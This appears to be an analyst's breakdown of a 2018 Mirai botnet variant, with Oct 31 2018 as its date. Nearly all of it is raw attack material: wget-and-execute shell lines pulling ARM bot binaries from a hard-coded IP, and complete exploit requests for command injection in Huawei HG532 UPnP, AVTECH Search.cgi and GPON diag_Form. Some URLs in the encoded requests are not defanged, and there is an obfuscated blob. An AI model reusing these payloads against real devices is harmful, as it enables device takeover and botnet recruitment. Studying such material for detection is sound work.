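- BREAKDOWN OF THE MIRAI BOTNET:
- -- Oct 31st, 2018
- (Note: URLs written as hxxp:// are defanged. The defanging also changed the SOAP namespace URIs in the Huawei request below; the standard SOAP namespaces use http://, so detection signatures should match http:// there. Some URLs inside the encoded request strings further down are not defanged.)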
- cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm7 -O d4rka; chmod 777 d4rka; ./d4rka avtech; rm -rf d4rka
- cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb avtech; rm -rf d4rkb
- cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm7 -O d4rka; chmod 777 d4rka; ./d4rka gpon_armv7l; rm -rf d4rka
- cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb gpon_armv4l; rm -rf d4rkb
- POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
- Content-Length: 430
- Connection: keep-alive
- Accept: */*
- Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
- <?xml version="1.0"?>
- <s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">
- <s:Body>
- <u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
- <NewStatusURL>$(/bin/busybox wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei; /bin/busybox chmod 777 * /tmp/ankitxd; /tmp/ankitxd huawei)</NewStatusURL>
- <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
- </u:Upgrade>
- </s:Body>
- </s:Envelope>
- hxxp://209.141.33.119/avtechsh
- hxxp://209.141.33.119/gponsh
- huagoagpoGET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
- User-Agent: Dark
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: close
- GET / HTTP/1.1POST /GponForm/diag_Form?images/ HTTP/1.1
- User-Agent: Dark
- Accept: */*
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded
- XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://209.141.33.119/gponsh+-O+/tmp/d4rk;sh+/tmp/d4rk`&ipv=0gjg*`evomkp*jap tvk|}tmta*gki+tvkg++a|a+b`+wpepqw+tvkg+jap+pgtwlahhajefhaw}wpaiwlfelwpevphmjq|wlahh+fmj+fqw}fk|$@EVO@EVO>$etthap$jkp$bkqj`jgkvvagpkcmjewwskv`ajpav+`ar+sepgl`kc+`ar+imwg+sepgl`kc+wfmj+sepgl`kc+fmj+sepgl`kc+`ar+BPS@P545[sepgl`kc+`ar+BPS@P545+sepgl`kc+`ar+sepgl`kc4+apg+`abeqhp+sepgl`kc+apg+sepgl`kc@EVO`kcapg?/dev/null
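- ########
- #SHELL:#
- ########
- (Fragment: the lines below are the tail of the Huawei <NewStatusURL> payload shown above; the opening `$(/bin/busybox` and the start of the SOAP envelope are not repeated here.)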
- wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei;
- /bin/busybox chmod 777 * /tmp/ankitxd;
- /tmp/ankitxd huawei)
- </NewStatusURL>
- <NewDownloadURL>
- $(echo HUAWEIUPNP)
- </NewDownloadURL>
- </u:Upgrade>
- </s:Body>
- </s:Envelope>
- ########
- #HTTP:#
- ########
- (Request lines and User-Agent string; the full AVTECH and GPON requests appear above.)
- GET / HTTP/1.1
- GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
- POST /GponForm/diag_Form?images/ HTTP/1.1
- POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
- User-Agent: Dark